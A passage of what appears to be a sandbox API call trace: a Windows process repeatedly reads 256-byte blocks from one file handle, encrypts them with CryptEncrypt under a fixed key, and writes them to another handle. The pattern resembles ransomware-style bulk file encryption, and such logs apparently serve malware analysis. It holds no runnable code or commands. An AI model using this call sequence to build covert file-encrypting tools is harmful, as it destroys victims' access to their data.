hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.302] GetLastError () returned 0x0 [0151.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.302] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.302] GetLastError () returned 0x0 [0151.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.302] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.302] GetLastError () returned 0x0 [0151.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.302] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.302] GetLastError () returned 0x0 [0151.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.302] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.302] GetLastError () returned 0x0 [0151.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.302] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.302] GetLastError () returned 0x0 [0151.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.303] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.303] GetLastError () returned 0x0 [0151.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.303] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.303] GetLastError () returned 0x0 [0151.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.303] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.303] GetLastError () returned 0x0 [0151.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.303] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.303] GetLastError () returned 0x0 [0151.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.303] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.303] GetLastError () returned 0x0 [0151.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.303] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.303] GetLastError () returned 0x0 [0151.303] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.303] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.304] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.304] GetLastError () returned 0x0 [0151.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.304] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.304] GetLastError () returned 0x0 [0151.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.304] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.304] GetLastError () returned 0x0 [0151.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.304] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.304] GetLastError () returned 0x0 [0151.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.304] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.304] GetLastError () returned 0x0 [0151.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.304] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.304] GetLastError () returned 0x0 [0151.304] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.304] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.304] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.304] GetLastError () returned 0x0 [0151.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.305] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.305] GetLastError () returned 0x0 [0151.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.305] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.305] GetLastError () returned 0x0 [0151.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.305] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.305] GetLastError () returned 0x0 [0151.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.305] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.305] GetLastError () returned 0x0 [0151.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.305] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.305] GetLastError () returned 0x0 [0151.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.305] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.305] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.305] GetLastError () returned 0x0 [0151.305] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.306] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.306] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.306] GetLastError () returned 0x0 [0151.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.306] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.306] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.306] GetLastError () returned 0x0 [0151.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.306] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.306] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.306] GetLastError () returned 0x0 [0151.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.306] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.306] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.306] GetLastError () returned 0x0 [0151.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.306] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.306] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.306] GetLastError () returned 0x0 [0151.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.306] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.306] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.306] GetLastError () returned 0x0 [0151.306] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.307] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.307] GetLastError () returned 0x0 [0151.307] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.307] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) 